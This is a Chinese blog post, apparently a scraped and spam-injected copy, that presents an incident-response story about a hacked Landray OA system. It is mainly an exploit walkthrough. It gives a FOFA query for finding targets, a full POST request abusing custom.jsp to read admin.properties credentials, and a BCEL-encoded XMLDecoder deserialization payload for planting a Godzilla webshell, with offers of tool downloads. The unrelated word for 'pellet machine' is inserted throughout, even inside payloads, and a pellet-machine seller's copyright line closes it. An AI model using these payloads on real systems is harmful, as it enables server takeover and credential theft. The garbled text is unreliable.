应急响应缘由
通报发现境外黑客组织利用跳板对某公司蓝凌OA办公系统实施漏洞利用攻击并控制,要求及时督促涉事单位对问题进行整改,事件发生的原因的活就传到我手上了,虽然蓝凌OA系统的漏洞都是几年前早就公开的颗粒机,但是现在还是有一部分公司在使用低版本蓝凌OA系统,也就是因为使用过时的OA系统导致发生严重安全事件。
FOFA语句app="Landray-OA系统"一、
任意文件读取漏洞描述蓝凌OA(EKP)存在任意颗粒机文件读取漏洞,构造恶意payload可以实现读取配置文件得到秘钥,实现登录admin.do页面。漏洞复现利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件拿到登录密码。访问/sys/ui颗粒机/extend/varkind/custom.jsp,抓包后1、将GET请求修改为POST,并加上payload请求数据发送
var={"body":{"file":"/WEB-INF/KmssConf颗粒机ig/admin.properties"}}2、注意构造的请求需要添加
Content-type: application/x-www-form-urlencodedpayload请求包
POST /sys颗粒机/ui/extend/varkind/custom.jsp HTTP/1.1User-Agent: Go-http-client/1.1Accept-Encoding: gzip, deflateCon颗粒机tent-Type: application/x-www-form-urlencodedHost: xx.xxxx.xxxxAccept: text/html, image/gif, image/jp颗粒机eg, *; q=.2, */*; q=.2Connection: closeContent-Length: 60var={"body":{"file":"/WEB-INF/KmssConfig/ad颗粒机min.properties"}}
使用哥斯拉进行连接,我用的版本v4.0.1。拿到的是颗粒机普通用户权限,我后面没有进行提权。
具体漏洞的请求数据如下,主要问题在com.landray.kmss.sys.search.jar包中,对FdParameters参数过滤不严,将字符串数据传递给oje颗粒机ctXmlDecoder时造成反序列化。
payload
var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=颗粒机editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util颗粒机.ClassLoader"> <void+method%3d"loadClass"> <string>$$BCEL$$$l$8b$……</string> <void+method%3d"newInstanc颗粒机e"></void> </void></void></java>
发送的shell代码可以使用哥斯拉自动生成,但是需要进行BCEL编码,下面是引用别人写的文章对BCEL Classloader的介绍和编颗粒机写的BCEL编码工具。
BCEL Classloader介绍:https://blog.csdn.net/xd_2021/article/details/121878806BCEL编码工具:https:/颗粒机/github.com/hunzi0/BCELCode该BCEL编码工具功能是对代码进行BCEL编码和解码,如有需要可以后台联系。运行步骤如下:漏洞都是两年前出现的高危漏洞,根据该事件可以看出颗粒机仍然有部分公司在使用存在已知漏洞的低版本蓝凌OA系统,并且根据通报是被境外黑客攻击控制。虽然漏洞复现很简单,但是该事件已是严重安全事件。文章主要是在基础的漏洞复现思路上使用安全工具来完成漏洞复现进行的颗粒机叙述。如有工具上的需求可以后台回复领取工具下载链接。
五、工具下载方法上面所涉及到的工具关注公众号,回复"LandrayOA"领取。工具已添加相关的运行环境,工具清单如下:
扫描二维码推送至手机访问。
版权声明:本文由木屑颗粒机_燃烧生物颗粒机那里有_生物质燃料颗粒机器设备发布,如需转载请注明出处。
